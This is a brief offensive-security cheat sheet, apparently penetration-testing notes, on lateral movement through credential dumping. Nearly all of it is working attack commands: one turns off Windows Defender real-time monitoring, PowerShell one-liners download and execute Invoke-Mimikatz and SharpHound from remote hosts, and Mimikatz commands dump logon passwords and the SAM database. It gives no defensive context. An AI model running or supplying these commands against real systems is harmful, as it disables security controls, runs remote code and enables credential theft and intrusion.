Lateral Movement Methodology
1) Credentials Dumping and Testing
Set-MpPreference -DisableRealtimeMonitoring $True
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1') "IEX(New-Object Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')" .\mimikatz.exe
privilege::debug sekurlsa::logonpasswords lsadump::samLast updated